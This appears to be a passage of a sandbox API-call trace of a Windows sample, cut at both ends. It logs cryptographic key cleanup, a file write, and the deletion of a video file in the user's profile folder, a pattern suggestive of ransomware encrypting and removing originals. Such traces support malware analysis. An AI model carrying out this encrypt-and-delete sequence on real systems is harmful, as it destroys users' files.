lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0214.944] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0214.944] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0214.944] CharUpperBuffW (in: lpsz="A170020032E", cchLength=0xb | out: lpsz="A170020032E") returned 0xb [0214.944] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0214.944] CharUpperBuffW (in: lpsz="SSA170020032E", cchLength=0xd | out: lpsz="SSA170020032E") returned 0xd [0214.944] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0214.944] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0214.944] CharUpperBuffW (in: lpsz="A0000901A0E", cchLength=0xb | out: lpsz="A0000901A0E") returned 0xb [0214.944] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0214.944] CharUpperBuffW (in: lpsz="SSA0000901A0E", cchLength=0xd | out: lpsz="SSA0000901A0E") returned 0xd [0214.944] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0214.945] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0214.945] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0214.945] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0214.945] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0214.979] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0214.979] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0214.979] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0214.979] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0214.979] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0214.979] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0214.979] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0214.981] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0214.981] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0214.981] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0214.981] WriteFile (in: hFile=0x510, lpBuffer=0x3867020*, nNumberOfBytesToWrite=0x5b80, lpNumberOfBytesWritten=0x8cf5e4, lpOverlapped=0x0 | out: lpBuffer=0x3867020*, lpNumberOfBytesWritten=0x8cf5e4*=0x5b80, lpOverlapped=0x0) returned 1 [0214.982] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0214.982] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0214.982] CharUpperBuffW (in: lpsz="A4D00401A22", cchLength=0xb | out: lpsz="A4D00401A22") returned 0xb [0214.982] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0214.982] CharUpperBuffW (in: lpsz="SSA4D00401A22", cchLength=0xd | out: lpsz="SSA4D00401A22") returned 0xd [0214.982] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0214.982] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0214.982] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0214.982] PeekMessageW (in: lpMsg=0x8cedb0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cedb0) returned 0 [0214.982] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0214.982] PeekMessageW (in: lpMsg=0x8cedb0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cedb0) returned 0 [0214.982] PeekMessageW (in: lpMsg=0x8cedb0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cedb0) returned 0 [0214.983] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0214.983] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0214.983] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x2aab5a8, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyKey", lpUsedDefaultChar=0x0) returned 16 [0214.983] CryptDestroyKey (hKey=0x9e2238) returned 1 [0214.983] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0214.983] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0214.983] CharUpperBuffW (in: lpsz="A170020032E", cchLength=0xb | out: lpsz="A170020032E") returned 0xb [0214.983] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0214.983] CharUpperBuffW (in: lpsz="SSA170020032E", cchLength=0xd | out: lpsz="SSA170020032E") returned 0xd [0214.983] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0214.983] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0214.983] CharUpperBuffW (in: lpsz="A0000901A0E", cchLength=0xb | out: lpsz="A0000901A0E") returned 0xb [0214.983] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0214.983] CharUpperBuffW (in: lpsz="SSA0000901A0E", cchLength=0xd | out: lpsz="SSA0000901A0E") returned 0xd [0214.983] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0214.983] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0214.983] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0214.983] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0214.983] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0214.983] PeekMessageW (in: lpMsg=0x8ced40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced40) returned 0 [0214.983] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0214.983] PeekMessageW (in: lpMsg=0x8ced40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced40) returned 0 [0214.983] PeekMessageW (in: lpMsg=0x8ced40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced40) returned 0 [0214.984] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0214.984] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0214.984] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0214.984] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0214.984] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0214.984] CharUpperBuffW (in: lpsz="A170020032E", cchLength=0xb | out: lpsz="A170020032E") returned 0xb [0214.984] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0214.984] CharUpperBuffW (in: lpsz="SSA170020032E", cchLength=0xd | out: lpsz="SSA170020032E") returned 0xd [0214.984] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0214.984] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0214.984] CharUpperBuffW (in: lpsz="A0000901A0E", cchLength=0xb | out: lpsz="A0000901A0E") returned 0xb [0214.984] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0214.984] CharUpperBuffW (in: lpsz="SSA0000901A0E", cchLength=0xd | out: lpsz="SSA0000901A0E") returned 0xd [0214.984] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0214.984] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0214.984] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0214.984] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0214.984] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0214.984] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0214.984] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0214.984] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0214.984] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0214.984] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0214.984] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0214.985] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0214.985] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0214.985] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0214.985] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0214.985] CharUpperBuffW (in: lpsz="A2300C04232", cchLength=0xb | out: lpsz="A2300C04232") returned 0xb [0214.985] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0214.985] CharUpperBuffW (in: lpsz="SSA2300C04232", cchLength=0xd | out: lpsz="SSA2300C04232") returned 0xd [0214.985] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0214.985] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0214.986] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0214.986] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0214.986] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x29f7080, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptReleaseContext", lpUsedDefaultChar=0x0) returned 20 [0214.986] CryptReleaseContext (hProv=0xa7c6e8, dwFlags=0x0) returned 1 [0214.986] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0214.986] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0214.986] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0214.986] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0214.986] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0214.986] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0214.986] FreeLibrary (hLibModule=0x76390000) returned 1 [0214.986] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0214.986] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0214.986] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0214.986] CloseHandle (hObject=0x504) returned 1 [0214.987] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0214.988] CloseHandle (hObject=0x510) returned 1 [0214.989] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0214.990] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0214.990] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0214.990] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf438, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0214.990] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Videos/X3KII9Ky2zq5leE1M.mkv", nBufferLength=0x104, lpBuffer=0x8cee18, lpFilePart=0x8cedf4 | out: lpBuffer="C:\\Users\\FD1HVy\\Videos\\X3KII9Ky2zq5leE1M.mkv", lpFilePart=0x8cedf4*="X3KII9Ky2zq5leE1M.mkv") returned 0x2c [0214.990] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Videos\\X3KII9Ky2zq5leE1M.mkv" (normalized: "c:\\users\\fd1hvy\\videos\\x3kii9ky2zq5lee1m.mkv")) returned 0x20 [0214.990] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Videos\\X3KII9Ky2zq5leE1M.mkv", lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd98edae0, ftCreationTime.dwHighDateTime=0x1d5ceb8, ftLastAccessTime.dwLowDateTime=0x6325c920, ftLastAccessTime.dwHighDateTime=0x1d5cf7d, ftLastWriteTime.dwLowDateTime=0x6325c920, ftLastWriteTime.dwHighDateTime=0x1d5cf7d, nFileSizeHigh=0x0, nFileSizeLow=0x5b7d, dwReserved0=0x2af0000, dwReserved1=0x8cf0e8, cFileName="X3KII9Ky2zq5leE1M.mkv", cAlternateFileName="X3KII9~1.MKV")) returned 0x9e1bf8 [0214.990] DeleteFileW (lpFileName="C:\\Users\\FD1HVy\\Videos\\X3KII9Ky2zq5leE1M.mkv" (normalized: "c:\\users\\fd1hvy\\videos\\x3kii9ky2zq5lee1m.mkv")) returned 1 [0214.994] FindNextFileW (in: hFindFile=0x9e1bf8, lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd98edae0, ftCreationTime.dwHighDateTime=0x1d5ceb8, ftLastAccessTime.dwLowDateTime=0x6325c920, ftLastAccessTime.dwHighDateTime=0x1d5cf7d, ftLastWriteTime.dwLowDateTime=0x6325c920, ftLastWriteTime.dwHighDateTime=0x1d5cf7d, nFileSizeHigh=0x0, nFileSizeLow=0x5b7d, dwReserved0=0x2af0000, dwReserved1=0x8cf0e8, cFileName="X3KII9Ky2zq5leE1M.mkv", cAlternateFileName="X3KII9~1.MKV")) returned 0 [0214.994] FindClose (in: hFindFile=0x9e1bf8 | out: hFindFile=0x9e1bf8) returned 1 [0214.994] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a74d28 | out: hHeap=0x2af0000) returned 1 [0214.994] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719b8 | out: hHeap=0x2af0000) returned 1 [0214.994] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaafc0 | out: hHeap=0x2af0000) returned 1 [0214.994] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae58 | out: hHeap=0x2af0000) returned 1 [0214.994] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab020 | out: hHeap=0x2af0000) returned 1 [0214.994] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0214.994] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab050 [0214.994] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab110 [0214.994] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719b8 [0214.994] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae58 [0214.995] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae70 [0214.995] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719c8 [0214.995] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0f8 [0214.995] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719c8 | out: hHeap=0x2af0000) returned 1 [0214.995] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xca) returned 0x29f7878 [0214.995] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b08 [0214.995] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0214.995] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0e0 [0214.995] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf00 [0214.995] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaafa8 [0214.995] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaafc0 [0214.995] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0e0 | out: hHeap=0x2af0000) returned 1 [0214.995] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab068 [0214.995] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719c8 [0214.995] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf438, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0214.995] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab080 [0214.995] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77aa8 [0214.995] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a08 [0214.995] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719c8 | out: hHeap=0x2af0000) returned 1 [0214.995] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7878 | out: hHeap=0x2af0000) returned 1 [0214.995] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b08 | out: hHeap=0x2af0000) returned 1 [0214.995] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaafc0 | out: hHeap=0x2af0000) returned 1 [0214.995] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaafa8 | out: hHeap=0x2af0000) returned 1 [0214.995] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab068 | out: hHeap=0x2af0000) returned 1 [0214.995] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf00 | out: hHeap=0x2af0000) returned 1 [0214.995] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0f8 | out: hHeap=0x2af0000) returned 1 [0214.995] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae70 | out: hHeap=0x2af0000) returned 1 [0214.995] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae58 | out: hHeap=0x2af0000) returned 1 [0214.996] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a18 [0214.996] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f7120 [0214.996] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaea0 [0214.996] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x60) returned 0x2a74f30 [0214.996] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77aa8 | out: hHeap=0x2af0000) returned 1 [0214.996] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaea0 | out: hHeap=0x2af0000) returned 1 [0214.996] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf48 [0214.996] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf48 | out: hHeap=0x2af0000) returned 1 [0214.996] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71af8 [0214.996] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71af8 | out: hHeap=0x2af0000) returned 1 [0214.996] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab068 [0214.996] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab068 | out: hHeap=0x2af0000) returned 1 [0214.996] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7120 | out: hHeap=0x2af0000) returned 1 [0214.996] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a18 | out: 